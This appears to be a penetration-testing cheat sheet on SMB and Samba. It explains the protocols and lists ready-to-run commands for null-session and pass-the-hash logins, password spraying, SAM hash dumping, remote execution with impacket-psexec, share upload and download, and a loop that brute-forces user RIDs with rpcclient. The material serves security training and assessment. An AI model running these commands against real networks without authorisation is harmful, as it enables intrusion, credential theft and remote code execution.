SMB

About

Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. The SMB protocol enables the client to communicate with other participants in the same network to access files or services shared with it on the network. By default is using ports 137, 138, 139, and 445

CrackMapExec

Null-session login, or Pass-The-Hash Attack

crackmapexec smb 13.13.13.13 -u Administrator -d . -H 12379N1D2YV31U20931C031 -x whoami
OR
crackmapexec smb {DOMAIN} -u '' -p '' --shares
OR
crackmapexec smb {DOMAIN} -u 'blibbityblabbity' -p '' --shares

Check if there are users from list available

crackmapexec smb {DOMAIN} -u users.txt -p '' -d . --continue-on-success
# Or we could do user=password type of attack with using:
crackmapexec smb {DOMAIN} -u users.txt -d . --no-bruteforce --continue-on-success

Command

Explanation

--shares

Look for SMB shares

--continue-on-success

Continue after finding right creds

--no-bruteforce

just using worlist without any variations

--rid-brute

Bruteforce RID

--local-auth

Local auth, without domain creds

-M

Use module

--sam

Extract SAM hashes

--exec-method

Method used for executing commands

--loggedon-users

Enumerate logged in users

Samba

Samba is an alternative variant to the SMB server, developed for Unix-based operating system. Samba implements the Common Internet File System (CIFS) network protocol. CIFS is a "dialect" of SMB. In other words, CIFS is a very specific implementation of the SMB protocol, which in turn was created by Microsoft. Therefore, it usually is referred to as SMB / CIFS. However, CIFS is the extension of the SMB protocol.

Samba server over TCP ports 137, 138, 139, but CIFS uses TCP port 445 only. In a network,using Samba, each host participates in the same workgroup. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network.
smbstatus command to see who, from which host, and which share the client is connected.

Config location:

cat /etc/samba/smb.conf | grep -v "#\|\;"

TOOLS

There are a lot different tools for SMB interacton:

Smbclient

Connecting to the Share with smbclient

smbclient -N -L //13.13.13.13

smbclient -U username \\\\13.13.13.13\\share

-N is for null session, which is anonymous access without the input user/pass. And -L is to list all shares.
For basic interaction with share, you would need only these commands:
- help to have list of available commands
- ls list
- get download
- !command user prefix ! before command to execute it locally

SMBMap

Regular SMB enum

smbmap -H 13.13.13.13

Recursive SMB enum

smbmap -H 13.13.13.13 -r share

Download to SMB server:

smbmap -H 13.13.13.13 --download "share\example.txt"

Upload to SMB server

smbmap -H 13.13.13.13 --upload example.txt "share\example.txt"

Impacket-smbclient

impacket-smbclient 'asdasda@domain.ad' -no-pass
sudo impacket-smbserver share ./ -smb2support # Creation of SMB Server

Impacket-psexec

impacket-psexec administrator:'amoguskek'@13.13.13.13
# Same goes for impacket-smbexec and impacket-atexec

RPCclient

Remote Procedure Call (RPC) is a concept and, therefore, also a central tool to realize operational and work-sharing structures in networks and client-server architectures. Other words, RPC is a mechanism for interaction between processes that are executed on different nodes in the network. The communication process via RPC includes passing parameters and the return of a function value. Also RPC have Remote Invocation Descriptor or RID,which is a unique identifier assigned to each remote procedure call. It is used to keep track of and manage the execution of remote procedures. Also there is a nice cheatsheet from SANS Institute [LINK]

Connect to SMB server

rpcclient -U "" 13.13.13.13
rpcclient $> {function}

With connected RPC client we could use many different functions as:

Function

Description

srvinfo

Server information

enumdomains

Enumerate all domains that are deployed in the network

querydominfo

Provides domain, server, and user information of deployed domains

netshareenumall

Enumerates all available shares

netsharegetinfo <share>

Provides information about a specific share

enumdomusers

Enumerates all domain users

queryuser <RID>

Provides information about a specific user

querygroup <RID>

Provides information about a specific group

Dangerous Settings

browseable = yes - Allow listing available shares in the current share?
read only = no - Forbid the creation and modification of files?
writable = yes - Allow users to create and modify files?
guest ok = yes - Allow connecting to the service without using a password?
enable privileges = yes - Honor privileges assigned to specific SID?
create mask = 0777 - What permissions must be assigned to the newly created files?
directory mask = 0777 - What permissions must be assigned to the newly created directories?
logon script = script.sh - What script needs to be executed on the user's login?
magic script = script.sh - Which script should be executed when the script gets closed?
magic output = script.out - Where the output of the magic script needs to be stored?

As example we will be using Windows 10.

For a beginning we need to make a folder.

Then we are going to use the Advanced Sharing option to configure share.

Keep in mind that with shared resources, both the SMB and NTFS permissions lists apply to every resource that gets shared in Windows.

Here we could do more precise NTFS permissions control. If the mark is grey, then permissions are inherited from parent directory.

sudo mount -t cifs -o username=venator17,password=ababagalabaga //13.13.13.13/"Sharename" /home/user/Desktop/

Tips2Hack

To bruteforce RID using rpcclient to do active enum of users and groups you could use this command:

for i in $(seq 500 1100);do rpcclient -N -U "" 13.13.13.13 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done